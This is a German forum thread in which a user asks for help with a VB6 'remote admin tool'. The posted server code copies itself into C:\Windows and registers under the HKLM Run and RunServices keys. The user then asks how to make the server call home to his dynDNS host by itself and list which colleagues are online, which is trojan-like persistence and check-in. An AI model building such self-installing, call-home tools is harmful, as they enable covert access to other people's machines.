Client & Server Remote Admin Tool

  • VB6

Es gibt 4 Antworten in diesem Thema. Der letzte Beitrag () ist von hnx.

    Client & Server Remote Admin Tool

    Hallo Liebe Community,

    ich hatte vor ein Client und ein Server zu coden sozusagen ein remote tool

    Server:

    Visual Basic-Quellcode

    1. Private Sub Form_Load()
    2. Call RegisterApp
    3. FileCopy App.EXEName & ".exe", "C:\Windows\" & App.EXEName & ".exe"
    4. ws.LocalPort = 6885
    5. ws.Close
    6. ws.Listen
    7. End Sub
    8. Private Sub ws_ConnectionRequest(ByVal requestID As Long)
    9. If ws.State <> sckClosed Then ws.Close
    10. ws.Accept requestID
    11. End Sub
    12. Private Sub ws_DataArrival(ByVal bytes As Long)
    13. Dim Dat As String
    14. ws.GetData Dat
    15. MsgBox Dat, vbInformation
    16. End Sub
    17. Private Sub RegisterApp()
    18. Call SetMyApplicationToRun(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "REMOTE", "C:\Windows\RT.exe")
    19. Call SetMyApplicationToRun(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\RunServices", "REMOTE", "C:\Windows\RT.exe")
    20. End Sub


    ws = winsock

    Client Code

    Visual Basic-Quellcode

    1. Private Sub Command1_Click()
    2. ws.Close
    3. ws.Connect Text1.Text, 6885
    4. Label1.Caption = "Connected"
    5. End Sub
    6. Private Sub Command2_Click()
    7. ws.Close
    8. Do
    9. DoEvents
    10. Loop Until ws.State = sckClosed
    11. Label1.Caption = "Disconnected"
    12. End Sub
    13. Private Sub Command3_Click()
    14. ws.SendData Text2.Text
    15. End Sub


    so nun wenn ich den server starte und dann den client und ich meine lokale ip wie auch meine online ip eingebe kommt Runtime Error 424 Object required was soll ich tun

    nun wie mache ich den client das er darauf connecten kann?? und es soll nicht "nur" über Lan funktionieren sondern im ganzen netz. ich glaube beim Server code müsste noch ws.RemotePort oder so stehen oder?? hoffe ihr habt paar tips, und es soll "kein trojaner" werden nicht das einige es denken. Es soll ein legales remote tool werden ...



    Vielen Dank
    In welcher Zeile kommt der Fehler? Die Fehlermeldung bedeutet, dass du auf ein Objekt zugreifst, was es nicht gibt (evtl falsch geschrieben?).
    Wenn dein Server im Internet laufen soll, brauchst du einen Server im Internet mit fester IP wo deine Server-Anwendung die ganze Zeit läuft oder nimmst dynDNS und lässt deinen Heimrechner die ganze Zeit online.
    Gruß, Agent Smith 8-)

    activeFlags = (lazy OR weary)

    Lemgo-Verschwörung | Mathematics | VB-Paradise in blau
    hallo nun das mit dem verbinden habe ich geschafft. :)

    nun ja ich möchte das der "server" automatisch zu meiner dyndns verbindet und ich das dann angezeigt bekomme im text feld etwa so



    PC NAME IP jo das wars

    also wie mache ich das der server automatisch zu meiner dyndns verbindet und wie mache ich im client das mir angezeigt wird welcher kollege online ist
    DynDNS installierst du auf deinem Heimrechner und du brauchst einen Account bei dyndns.org, dort bekommst du dann eine Art "ID", welche die Clients dann als Ziel-IP/Domain für deinen Server verwenden können. Dein Heimrechner übermittelt dann an dyndns-org deine aktuelle IP, da diese sich wahrscheinlich ändert. Die Server-Anwendung verbindet sich nicht, er "lauscht" lediglich nach Clients, die sich ihrerseits mit dem Server verbinden wollen. Und der Server muss diese Verbindungen akzeptieren und kann dies in einer Wer-Ist-Online Anzeige darstellen.
    Gruß, Agent Smith 8-)

    activeFlags = (lazy OR weary)

    Lemgo-Verschwörung | Mathematics | VB-Paradise in blau
    hallo Agent!

    Das mit Dyndns.org sich anmelden usw weiß ich, will aber wissen wie ich connecten soll

    also wi der code ist Winsock1.Connect = "dyndns.no-ip.biz", "6885" ?

    und wie mache ich das mit der Wer ist wo Online Anzeige?? vielleicht einen source oder eine anstosshilfe :)



    Vielen Dank